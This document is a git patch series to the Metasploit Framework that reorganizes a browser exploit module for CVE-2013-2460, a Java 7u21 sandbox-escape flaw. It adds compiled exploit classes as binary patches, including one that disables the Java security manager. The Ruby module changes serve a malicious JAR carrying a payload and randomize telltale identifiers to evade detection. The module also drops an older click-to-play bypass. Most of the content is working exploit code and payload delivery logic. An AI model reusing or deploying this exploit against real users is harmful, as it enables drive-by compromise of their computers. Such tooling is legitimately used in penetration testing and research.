From d25e1ba44ec919e5cd7eb3814050a6f8fef49790 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 25 Jun 2013 12:58:00 -0500 Subject: [PATCH 1/4] Make fixes proposed by review and clean --- .../DisableSecurityManagerAction.class | Bin 0 -> 777 bytes data/exploits/cve-2013-2460/ExpProvider.class | Bin 0 -> 135 bytes data/exploits/cve-2013-2460/Exploit.class | Bin 0 -> 3375 bytes .../DisableSecurityManagerAction.class | Bin 922 -> 0 bytes .../provider_skeleton/ExpProvider.class | Bin 135 -> 0 bytes data/exploits/provider_skeleton/Exploit.class | Bin 4414 -> 0 bytes .../.classpath | 0 .../.project | 0 .../DisableSecurityManagerAction.java | 0 .../src => cve-2013-2460}/ExpProvider.java | 0 .../src => cve-2013-2460}/Exploit.java | 0 .../source/exploits/cve-2013-2460/Makefile | 19 ++++++++++++++++++ .../.settings/org.eclipse.jdt.core.prefs | 11 ---------- .../bin/DisableSecurityManagerAction.class | Bin 922 -> 0 bytes .../provider_skeleton/bin/ExpProvider.class | Bin 135 -> 0 bytes .../provider_skeleton/bin/Exploit.class | Bin 4414 -> 0 bytes 16 files changed, 19 insertions(+), 11 deletions(-) create mode 100644 data/exploits/cve-2013-2460/DisableSecurityManagerAction.class create mode 100644 data/exploits/cve-2013-2460/ExpProvider.class create mode 100644 data/exploits/cve-2013-2460/Exploit.class delete mode 100644 data/exploits/provider_skeleton/DisableSecurityManagerAction.class delete mode 100644 data/exploits/provider_skeleton/ExpProvider.class delete mode 100644 data/exploits/provider_skeleton/Exploit.class rename external/source/exploits/{provider_skeleton => cve-2013-2460}/.classpath (100%) rename external/source/exploits/{provider_skeleton => cve-2013-2460}/.project (100%) rename external/source/exploits/{provider_skeleton/src => cve-2013-2460}/DisableSecurityManagerAction.java (100%) rename external/source/exploits/{provider_skeleton/src => cve-2013-2460}/ExpProvider.java (100%) rename external/source/exploits/{provider_skeleton/src => cve-2013-2460}/Exploit.java (100%) create mode 100644 external/source/exploits/cve-2013-2460/Makefile delete mode 100644 external/source/exploits/provider_skeleton/.settings/org.eclipse.jdt.core.prefs delete mode 100644 external/source/exploits/provider_skeleton/bin/DisableSecurityManagerAction.class delete mode 100644 external/source/exploits/provider_skeleton/bin/ExpProvider.class delete mode 100644 external/source/exploits/provider_skeleton/bin/Exploit.class diff --git a/data/exploits/cve-2013-2460/DisableSecurityManagerAction.class b/data/exploits/cve-2013-2460/DisableSecurityManagerAction.class new file mode 100644 index 0000000000000000000000000000000000000000..1e22a53da0760bfc6d5f12f13ab499c4b1e6e11a GIT binary patch literal 777 zcmaJfgc5Pjo@xEPm&G(b~IA$-*-5;<@TAXNoUDIldPLgKPIRGKBoWl3R(D?= zs`f}F!}ja`zK&f-5WM&p>#;LwlKHqzyO&OEtY4ZOuld|$IdV_O6KmYjj!M)}+pRdy zf0UzzxQM_Jm?*-3i)jWve^8tTEcWX2WZUS4)T!~<*ys`HHr*3P3ohiFDI zWfUx*V$WiN_5T~)iesH++iBu#IvQy!2nXqD_kyRpLgwOjCEb^E^}U8(icWb%nW&K9wo3!3}A`g3jNFURcY051$AoB^8U~%J}&2?QX)c?QLkW% l3T7abV_f)w@;efKW);Us85CWt5W7J{P;)E%>iqX`^)F9DzL)?2 literal 0 HcmV?d00001 diff --git a/data/exploits/cve-2013-2460/ExpProvider.class b/data/exploits/cve-2013-2460/ExpProvider.class new file mode 100644 index 0000000000000000000000000000000000000000..33a56dfdf16584e0126d5ef9f5cc59bfc3a52c64 GIT binary patch literal 135 zcmX^0Z`VEs1_omWPId-1b_RBK1`b9BuHgLAqU2P!%$!t41_9TKf`Fp@vdom!BE77{ zvP4D(ZX_X~0+677PGVlVzJF3yYH|r9gG6$Eu6}W8o_0%iakBLgD?6A&{4 OEoA`GEI^WpffWGx6e1D; literal 0 HcmV?d00001 diff --git a/data/exploits/cve-2013-2460/Exploit.class b/data/exploits/cve-2013-2460/Exploit.class new file mode 100644 index 0000000000000000000000000000000000000000..3db623cbd08ecaeb9b55e47a5cf6dbc2bb596dce GIT binary patch literal 3375 zcma)9TXP&o75-X#>Cx=yva^=WIB_gr5=$#-H{4=pWlSVrl8v>plU0=1B81UwOB#DL zvzeWhr9cP?BwWKiB!Lj_HV-^NLDm8SMe#)O#xun)po#~ocmvGonO*HD5=kD^tvTI& z`a9qGPIvF0|NEQY19(4vs-lSVy(nOYqoN{#^D1(fRd7K?78g}KgomZMDw{bKk6@nT zQQ1GH;u0=%EGYO0$K!JPM>(Fz;A1d37Nt*1K~1GzC|FXktYAfc*&J6CTvg!6HLD6- z6&~ucc~XHd`-U6|R5Y>1agAeL!G?;b@NpGG_=Iep=J+JXGYl!)UGpr4J7=z#Yi7|g z-Q}V$mKSFx{FX{7HtS<9SyZ(lgXG>kL}ib%lT0F&hohU^o_YBRyXg z#fk`4yjtX;aWq;-j?yP>*A7lGBt}N($?s{eCKv{0Y*)-SR~LmpXD&Kq>8l2&b+uyF z!|xDwh2v8k&r)a%hU1yFaQjExn(#0B_S$LB4a9mtF^$B~R0H33mnTPKrf?ZSQO~Yh zqAug42zr-A5J6^Gi93j9$CkG}#w^j4g&mg5@m+VJWs>7Lj!$!ZhU0m{Q}vp@CC=G0 ze(mgf-SO<8AoHW)9vs(jH{Q!|AWWF;6{j}>G3EQ_#)W23Zw3TQn5!CIz-Ji_pRpT~ z$EvWJz8!2-OxIi%{*)!7Em$&b8a{{56P+5qfG=wJ5?<8sWqgI>s~WzBuQOx_!A0L& zvx#2~-@rFHUefR_yv%S%S2VkXMQo;}T%=A0x-&zTG@QmO41-h}P z>~)8B^W9dGhWFuv3}cO^Tk!nl!m9U_?Ko!0R>Sh`dQh-Q4!&zTg|;v>+=nTKn%b(cfTGbAy8MDQ(?!@voPJ+h@@L~w*=b} zba(>ol5mFGy70D*&u!GHP7ZcQXT56ET8WBytF#%0yEDp;BbH5P%CbbG5u2h=@rSe% z#*ui@hDJInax~##(Fp5vsu7hM!)W}Rh)C)jG~0tD4@t^xjn3VXh3U~U_1CB@2|lOq za#@~)nZVnsXqrAUDj7Ryd8_y$qkcldh83+TT1+BVla zPuzI!I+!9s5Z)s@@$LdL9f^#g8sD*vHg?3n#eE#hE}^weM9nsRZJFKykJR(tETNT>>Y{6*O5A@ zR;5LB%}2F39S^Tgcgac6Kb%T9;!xVMc)FB94@ zBR8D4{h(<&I7Bb4BE9i?=#Q>jY9VhLY7=1c7N+(D!2X3aJ@~-(P8x#bF%71kE~*JWgU9Q}lJ7k}yYUxI_t9BKn`k2k<;4 z;YCWoOGN*5OyXxW`Vwj8&r?ri^qugW1aX&uKlKi`3pltN`=m`!SN%WoTF+ zfjv%)J%Jn;0wcq13C$(Vlz9#tq)W zcqx4YgWc~5iAwGtg#*>tdM#!0lp8sH&<1EKHEku!~mG=|d VJ;b*3@*rgiPzl=*2IxnU@jr12kLmyb literal 0 HcmV?d00001 diff --git a/data/exploits/provider_skeleton/DisableSecurityManagerAction.class b/data/exploits/provider_skeleton/DisableSecurityManagerAction.class deleted file mode 100644 index 85bb39f191ba23f95d6adfb824cf9d73105aef12..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 922 zcmaJfgc5PfT#Iv9tfNhmFpLilQ$O60(e08&-pXuYZEFX9Rp zs6gTe@S}k7#!5(3CCR-URvndb~{ zYv+i;+fN5FfQu_3e3Sx|QSot=VQZdoPY9W1`)Oiy8pl$HsA82N9Hg^a49{B8eA+Cy zAf&r9LH^fBH$WZNd^DD{GwEW=6=Dq~hRR5*#Pkdo9}hJbl01=0TCU+Tkro(#1p z6+AxTTIF`(^vnm9QLoXmv3D655fp+inDK%r!k4X<13oJ1xO$v0G+Gxl%@9o6$$Z>p zsLwV$jRd%lhdv(6?Z0=H8F><78!hTDlV;&+sIg)ncFGIUZodAYmyWfNujp79n#-o} zC|89h=y2$}L^tcuOD9AB%VZgP9eQi+?+DuG2;Y51Dcb#p+E^lsrc)xAT}+-h1aPpmc| jWaqf|6YhJG^o0xAF16^W2yVNsD5ZISJN;rHa< diff --git a/data/exploits/provider_skeleton/ExpProvider.class b/data/exploits/provider_skeleton/ExpProvider.class deleted file mode 100644 index afc3cac3cae26786757a1ec4036ca993fcab383c..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 135 zcmX^0Z`VEs1_omWPId++Mh0%zih_Wm{IblH)FO5U7Dfhvti-ZJ{hY+SbbbG%tkmQZ zb_O;^28rbST>awGJpGcQ#Nuw}rsGUdS)Q;0AaoU*DZltxniM*?> zR!Q9Q4sXh{P$&@I5ZCjxk;|@@{5Oe$rjjwhri4p=daL0@0#vpBC60nl3$@HZsG8J82jEndJ>b zoK`7uLF1jKWxBfsBAs2MT))RI7zsqstfC2tCI~E15ksSbHi0!B2-D6COuI(EpiQ|kw`x~`<8RVP{GQD`02xY#uYX`!a z_LDDj@~Db;NiIptI6G*SUERv_yn7Gcr{KLjgQpBvFMDTl=CD33g{}n9tqFKk!3S$cftSOhla75>9$-A3hM4U`m8p}4bJVw_hInijM|H=P?}0JuPMSOs zn}&ib0gvX^ygcVZ=L!!8pXiNFU@l5}iv}v=*CF6t130!O(6A#=1BL z_gdVY^fxj6l7kOM-l@VY0*DHpqIT*TK4j-A`AI)XbC?u7EznV)G*~Pe6MC^fpEt_o zxmgKZ#*Bih!0P(cc`ZX`Q^hQvB`|I$UOJ^kU?AKa{Pc#Q`j+sfUEq}$j1fGi;wqk} zZ+5W)bL^TFslL$n!pwy%3titZuzzFrLcgfuB^f#?Lyww{ThZB21>*-q{h}pUpNeDo ztXoW8JtfGRBn6MQHE#%o?sDF(b-yVah#GVR@A&2Gpv6^dg50uS2(?fZOpXw$bNyd;&Z0ICkO7 zyl#J;&+niQKjf-Q*o~)oHNL{| zjMn3y_%uF4rv3N>K8w#$LFr6{n)p0VMo&;; zkCW+FI7*V)DSQWYmFg;G6vC=vA!1w>WAes|3DH zFDZHfvlP8f$T0;%L92rA^05h|-x#tHnP>Z(oWw1u5E7a4I?CVg(My!p^Kt{=C5{z7 zvtl^ae#lc;REtJZ7js)uKhUC5w=r6mWgE4|NO#Uxa7=3q^xHn%bBU`PJbi2;dtj7r z_c325=zokEe}MXUkV<)om`)OZ!K=#wKWb1H#%E@JL{tr&@nf=Wpoi`F2}cq7$#^-7 z($iWm-!b~rsK=j?c7wc<@>lYbZ+VRrCi|F2d?0dF5(_&H6k{MVCDeM|}Tt9Jb;Y#4BV>{E}>B z^Vy1Dc^u?O);;RkUZ$pF^t**zFEC1yC7s19%!#bAiiX$Fp}fgc5PfT#Iv9tfNhmFpLilQ$O60(e08&-pXuYZEFX9Rp zs6gTe@S}k7#!5(3CCR-URvndb~{ zYv+i;+fN5FfQu_3e3Sx|QSot=VQZdoPY9W1`)Oiy8pl$HsA82N9Hg^a49{B8eA+Cy zAf&r9LH^fBH$WZNd^DD{GwEW=6=Dq~hRR5*#Pkdo9}hJbl01=0TCU+Tkro(#1p z6+AxTTIF`(^vnm9QLoXmv3D655fp+inDK%r!k4X<13oJ1xO$v0G+Gxl%@9o6$$Z>p zsLwV$jRd%lhdv(6?Z0=H8F><78!hTDlV;&+sIg)ncFGIUZodAYmyWfNujp79n#-o} zC|89h=y2$}L^tcuOD9AB%VZgP9eQi+?+DuG2;Y51Dcb#p+E^lsrc)xAT}+-h1aPpmc| jWaqf|6YhJG^o0xAF16^W2yVNsD5ZISJN;rHa< diff --git a/external/source/exploits/provider_skeleton/bin/ExpProvider.class b/external/source/exploits/provider_skeleton/bin/ExpProvider.class deleted file mode 100644 index afc3cac3cae26786757a1ec4036ca993fcab383c..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 135 zcmX^0Z`VEs1_omWPId++Mh0%zih_Wm{IblH)FO5U7Dfhvti-ZJ{hY+SbbbG%tkmQZ zb_O;^28rbST>awGJpGcQ#Nuw}rsGUdS)Q;0AaoU*DZltxniM*?> zR!Q9Q4sXh{P$&@I5ZCjxk;|@@{5Oe$rjjwhri4p=daL0@0#vpBC60nl3$@HZsG8J82jEndJ>b zoK`7uLF1jKWxBfsBAs2MT))RI7zsqstfC2tCI~E15ksSbHi0!B2-D6COuI(EpiQ|kw`x~`<8RVP{GQD`02xY#uYX`!a z_LDDj@~Db;NiIptI6G*SUERv_yn7Gcr{KLjgQpBvFMDTl=CD33g{}n9tqFKk!3S$cftSOhla75>9$-A3hM4U`m8p}4bJVw_hInijM|H=P?}0JuPMSOs zn}&ib0gvX^ygcVZ=L!!8pXiNFU@l5}iv}v=*CF6t130!O(6A#=1BL z_gdVY^fxj6l7kOM-l@VY0*DHpqIT*TK4j-A`AI)XbC?u7EznV)G*~Pe6MC^fpEt_o zxmgKZ#*Bih!0P(cc`ZX`Q^hQvB`|I$UOJ^kU?AKa{Pc#Q`j+sfUEq}$j1fGi;wqk} zZ+5W)bL^TFslL$n!pwy%3titZuzzFrLcgfuB^f#?Lyww{ThZB21>*-q{h}pUpNeDo ztXoW8JtfGRBn6MQHE#%o?sDF(b-yVah#GVR@A&2Gpv6^dg50uS2(?fZOpXw$bNyd;&Z0ICkO7 zyl#J;&+niQKjf-Q*o~)oHNL{| zjMn3y_%uF4rv3N>K8w#$LFr6{n)p0VMo&;; zkCW+FI7*V)DSQWYmFg;G6vC=vA!1w>WAes|3DH zFDZHfvlP8f$T0;%L92rA^05h|-x#tHnP>Z(oWw1u5E7a4I?CVg(My!p^Kt{=C5{z7 zvtl^ae#lc;REtJZ7js)uKhUC5w=r6mWgE4|NO#Uxa7=3q^xHn%bBU`PJbi2;dtj7r z_c325=zokEe}MXUkV<)om`)OZ!K=#wKWb1H#%E@JL{tr&@nf=Wpoi`F2}cq7$#^-7 z($iWm-!b~rsK=j?c7wc<@>lYbZ+VRrCi|F2d?0dF5(_&H6k{MVCDeM|}Tt9Jb;Y#4BV>{E}>B z^Vy1Dc^u?O);;RkUZ$pF^t**zFEC1yC7s19%!#bAiiX$Fp} Date: Tue, 25 Jun 2013 12:58:39 -0500 Subject: [PATCH 2/4] Delete project files --- .../source/exploits/cve-2013-2460/.classpath | 7 ------- external/source/exploits/cve-2013-2460/.project | 17 ----------------- 2 files changed, 24 deletions(-) delete mode 100644 external/source/exploits/cve-2013-2460/.classpath delete mode 100644 external/source/exploits/cve-2013-2460/.project diff --git a/external/source/exploits/cve-2013-2460/.classpath b/external/source/exploits/cve-2013-2460/.classpath deleted file mode 100644 index 055332f894..0000000000 --- a/external/source/exploits/cve-2013-2460/.classpath +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/external/source/exploits/cve-2013-2460/.project b/external/source/exploits/cve-2013-2460/.project deleted file mode 100644 index 701ca81075..0000000000 --- a/external/source/exploits/cve-2013-2460/.project +++ /dev/null @@ -1,17 +0,0 @@ - - - msf_issue61 - - - - - - org.eclipse.jdt.core.javabuilder - - - - - - org.eclipse.jdt.core.javanature - - From 127300c62d551ea6122de6577eb6dc217a731976 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 25 Jun 2013 12:59:42 -0500 Subject: [PATCH 3/4] Fix also ruby module --- .../browser/java_jre17_provider_skeleton.rb | 91 ++++++------------- 1 file changed, 29 insertions(+), 62 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index df24cfcf16..02d9c677bd 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking # Because there isn't click2play bypass include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE @@ -17,6 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) + EXPLOIT_STRING = "Exploit" + def initialize( info = {} ) super( update_info( info, @@ -24,19 +26,20 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability - affects Java version 7u21 and earlier. This exploit bypasses click-to-play on Internet Explorer - and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java - Web Start can be launched automatically through the ActiveX control. Otherwise, the - applet is launched without click-to-play bypass. + affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisor and also POC + 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ + [ 'CVE', '2013-2460' ], + [ 'OSVDB', '94346' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], + [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], @@ -74,68 +77,40 @@ class Metasploit3 < Msf::Exploit::Remote )) end - - def setup - path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "Exploit.class") - @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "ExpProvider.class") - @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "DisableSecurityManagerAction.class") - @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - @exploit_class_name = rand_text_alpha("Exploit".length) - @exploit_class.gsub!("Exploit", @exploit_class_name) - - @jnlp_name = rand_text_alpha(8) - - super + def randomize_identifier_in_jar(jar, identifier) + identifier_str = rand_text_alpha(identifier.length) + jar.entries.each { |entry| + entry.name.gsub!(identifier, identifier_str) + entry.data = entry.data.gsub(identifier, identifier_str) + } end - def jnlp_file - jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" - jnlp = %Q| - - - - Applet Test JNLP - #{rand_text_alpha(8)} - #{rand_text_alpha(8)} - - + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") + @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") + @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - - - - - - - - - | - return jnlp + @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) + @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) + + super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri - when /\.jnlp$/i - send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" }) when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) - metasploit_str = rand_text_alpha("metasploit".length) - payload_str = rand_text_alpha("payload".length) - jar.entries.each { |entry| - entry.name.gsub!("metasploit", metasploit_str) - entry.name.gsub!("Payload", payload_str) - entry.data = entry.data.gsub("metasploit", metasploit_str) - entry.data = entry.data.gsub("Payload", payload_str) - } + randomize_identifier_in_jar(jar, "metasploit") + randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) @@ -154,18 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_html - jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" - - # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass - # Else an tag is used to load the malicious applet, this time there isn't click2play bypass html = %Q| - - - - - + | From 4fa789791d9a1afa9a1cd6a1a187bb21caa91fc5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 25 Jun 2013 13:10:15 -0500 Subject: [PATCH 4/4] Explain Ranking --- modules/exploits/multi/browser/java_jre17_provider_skeleton.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 02d9c677bd..18cdd1f6db 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking # Because there isn't click2play bypass + Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE